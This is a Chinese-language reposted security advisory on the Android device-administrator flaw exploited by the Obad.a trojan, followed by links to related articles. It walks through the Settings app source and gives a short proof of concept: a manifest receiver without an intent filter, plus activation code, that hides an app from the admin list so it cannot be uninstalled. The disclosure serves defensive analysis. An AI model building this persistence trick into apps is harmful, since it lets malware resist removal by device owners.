一、漏洞描述

目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。其实该漏洞早在去年底已被发现。(http://www.anguanjia.com/?c=news_view&id=435

注册为“设备管理器”的应用是无法被直接卸载的。只有取消激活“设备管理器”后才可以直接卸载。

 木马可以利用Android设备管理器漏洞达到在设备管理器列表“隐身”的效果。这样用户就无法进去“取消激活”页面,从而达到无法卸载的目的。

二、影响版本

android2.2及以上

三、漏洞原理

首先我们来看一下Settings app如何形成设备管理器列表的:

相关类:

 packages\apps\settings\src\com\android\settings\DeviceAdminSettings.java  

 public class DeviceAdminSettings extends ListFragment {

     DevicePolicyManager mDPM;

     final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>();

     final ArrayList<DeviceAdminInfo> mAvailableAdmins = new ArrayList<DeviceAdminInfo>();

     @Override

     public void onResume() {

         super.onResume();

         updateList();

     }

     void updateList() {

         mActiveAdmins.clear();

         List<ComponentName> cur = mDPM.getActiveAdmins();

         if (cur != null) {

             for (int i=0; i<cur.size(); i++) {

                 mActiveAdmins.add(cur.get(i));

             }

         }

         mAvailableAdmins.clear();

         List<ResolveInfo> avail = getActivity().getPackageManager().queryBroadcastReceivers(

                 new Intent(DeviceAdminReceiver.ACTION_DEVICE_ADMIN_ENABLED),

                 PackageManager.GET_META_DATA);// 通过查询广播Intent Filter为”android.app.action.DEVICE_ADMIN_ENABLED“来得到可用的设备管理器程序列表

         int count = avail == null ? 0 : avail.size();

         for (int i=0; i<count; i++) {

             ResolveInfo ri = avail.get(i);

             try {

                 DeviceAdminInfo dpi = new DeviceAdminInfo(getActivity(), ri);

                 if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) {

                     mAvailableAdmins.add(dpi);

                 }

                 //如果应用已激活设备管理器&&注册了含Intent Filter为”android.app.action.DEVICE_ADMIN_ENABLED“就出现在可用设备管理器列表

             } catch (XmlPullParserException e) {

                 Log.w(TAG, "Skipping " + ri.activityInfo, e);

             } catch (IOException e) {

                 Log.w(TAG, "Skipping " + ri.activityInfo, e);

             }

         }

         getListView().setAdapter(new PolicyListAdapter());

     }

    .......

     class PolicyListAdapter extends BaseAdapter {

       .......

         public void bindView(View view, int position) {

             final Activity activity = getActivity();

             ViewHolder vh = (ViewHolder) view.getTag();

             DeviceAdminInfo item = mAvailableAdmins.get(position);//显示mAvailableAdmins中数据

             vh.icon.setImageDrawable(item.loadIcon(activity.getPackageManager()));

             vh.name.setText(item.loadLabel(activity.getPackageManager()));

             vh.checkbox.setChecked(mActiveAdmins.contains(item.getComponent()));

             try {

                 vh.description.setText(item.loadDescription(activity.getPackageManager()));

             } catch (Resources.NotFoundException e) {

             }

         }

     }

 }

由Android Settings App源代码可以看出,设备管理器列表显示可用的设备管理器程序是通过查询: “IntentFilter动作为 android.app.action.DEVICE_ADMIN_ENABLED” ,且具备“<meta-data android:name="android.app.device_admin" android:resource="@xml/xxx" />”的Receiver来得到的。

对于注册设备管理器,并不需要Intent Filter,只需要meta-data就可以。

如果想在设备管理器列表中”隐身“,只要不带Intent Filter注册设备管理器,就会导致用户无法取消设备管理器的激活,也就无法卸载该app。

四、POC代码
 AndroidMainfest.xml文件注册组件:

 <receiver Android:name=".deviceAdminReceiver" android:label="@string/app_name"

    Android:description="@string/description" android:permission="android.permission.BIND_DEVICE_ADMIN"> 

    <meta-data Android:name="android.app.device_admin"

                Android:resource="@xml/device_admin" /> 

 </receiver>

java代码注册激活设备管理器:

 Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);

 ComponentName  mDeviceComponentName = new ComponentName("packagename","packagename.deviceAdminReceiver");

 intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,

        mDeviceComponentName);

 this.startActivity(intent,0);

五、相关链接
      http://www.anguanjia.com/?c=news_view&id=435
      http://blog.csdn.net/jiazhijun/article/details/9045773

本文转自http://blog.csdn.net/androidsecurity/article/details/9124747

Android设备管理器漏洞(转)的更多相关文章

  1. Android设备管理器漏洞2--禁止用户取消激活设备管理器

    2013年6月,俄罗斯安全厂商卡巴斯基发现了史上最强手机木马-Obad.A.该木马利用了一个未知的Android设备管理器漏洞(ANDROID-9067882),已激活设备管理器权限的手机木马利用该漏 ...

  2. (转)关于android设备管理器的一些分析

    转自http://bbs.pediy.com/showthread.php?t=183692 想必很多人都知道轰动一时android木马OBAD,该木马利用android设备管理器的漏洞,当用户激活设 ...

  3. Android 设备管理器 阻止用户取消激活

    该方案测试可行,系统版本4.4.2.它算是借助android系统的一个bug,不确定在后续更高的版本中是否修复. 该功能和360防卸载功能一样的实现原理. 主要的参考资料是:http://bbs.pe ...

  4. Android设备管理器——DevicePolicyManager

    自从安卓2.2(API=8)以后,安卓手机是通过设备管理API对手机进行系统级的设备管理. 本篇通过大家熟悉的"一键锁屏"的小项目实现来介绍设备管理API如何通过强制设备管理策略创 ...

  5. Android设备管理器 DevicePolicyManager

    设备管理器有个特点,你注册了之后如果不解除注册就会难以卸载带有设备管理器的应用,目前4.3版本仍未提示用户如何卸载,maybe later. 在「设定-安全」你可以看见「设备管理器」,它提供一些高级功 ...

  6. Android Device Administration 设备管理器——实现一键锁屏

    Android Device Administration 设备管理器--实现一键锁屏 最近研究了一下安全这一块的内容,当然,我是比较水的,所以也拿不出什么好知识点,但是有一些冷门的东西我还是可以聊聊 ...

  7. 关于android的设备管理器-DevicePolicyManager(二)

    上回分析到了/data/system/device_policies.xml这个文件是在package change事件发生的时候变化的.那么来看看它的内容. 依据以往的经验.在/data/syste ...

  8. Android学习笔记_61_手机安全卫士知识点归纳(1)状态/形状图形 GPS 设备管理器DeviceAdminReceiver ImageView属性

    1.在做程序自动安装更新的时候 ,必须保证程序的签名和包名是相同.  C:\Documents and Settings\zehua\.android  \ debug.keystore  debug ...

  9. 关于android的设备管理器-DevicePolicyManager(一)

    在Andorid的设置->安全里面有个设备管理器的选项,相信大部分android用户都不太会去注意这个东西.近期在安装了一个应用之后发现这个里面的东西变了.怎么回事呢,研究研究看看.</s ...

随机推荐

  1. 自定义适用于手机和平板电脑的 Dynamics 365(二):窗体自定义项

    适用于手机的 Dynamics 365 和 适用于平板电脑的 Dynamics 365 使用窗体作为 Web 应用. 窗体在应用程序中的显示方式为移动体验进行了优化. 下图显示了从 Web 应用程序到 ...

  2. 8 张脑图入门 JavaScript - 基础面试不倒

    8 张脑图入门 JavaScript - 基础面试不倒 转载请注明出处 第一:JavaScript 的变量 第二:JavaScript 运算符 第三:JavaScript 数组 第四:JavaScri ...

  3. Python+Selenium笔记(十三):Page Object设计模式

    (一) 前言 简单的说就是分为2层,页面class 和测试class. 页面class:分为父类和子类(子类指具体的页面,每一个页面都创建一个类),父类中定义公有的属性和方法(操作). #对面向对象有 ...

  4. 解决在IDEA 的Maven下 出现 Cannot access in offline mode 问题

    去掉maven前面的work offline模式

  5. scott/tiger is locked 解决办法

    在plsql developer中要是以scott/tiger登录时提示ora-28000 the account is locked. 解决办法: 新装完Oracle10g后,用scott/tige ...

  6. The attribute required is undefined for the annotation type XmlElementRef

    异常描述: 几天没用的项目导进Eclipse中发现有异常 public class BooleanFeatureType extends FeatureBaseType{ @XmlElementRef ...

  7. CSS| 解决子级用css float浮动 而父级div没高度不能自适应高度

    解决子级用css float浮动 而父级div没高度不能自适应高度 解决子级对象使用css float浮动 而父级div不能自适应高度,不能被父级内容撑开解决方法,父级div没有高度解决方法. 最外层 ...

  8. 斯诺克台球比赛规则 (Snooker)

    斯诺克台球比赛规则 斯诺克(Snooker)的意思是“阻碍.障碍”,所以斯诺克台球有时也被称为障碍台球.此项运动使用的球桌长约3569毫米.宽1778毫米,台面四角以及两长边中心位置各有一个球洞,使用 ...

  9. jQuery插件实例六:jQuery 前端分页

    先来看看效果: 对于前端分页,关键是思路,和分页算法.本想多说两句,可又觉得没什么可说的,看代码吧: 如何使用? $("#pging").zPagination({ 'navEve ...

  10. MySQL基础之 统计函数总结

    五种统计函数:count().max().avg().min().max()函数 count()函数 count()函数在进行计算的时候,是分情况进行计算的,主要是一下两种 1.采用count(*)对 ...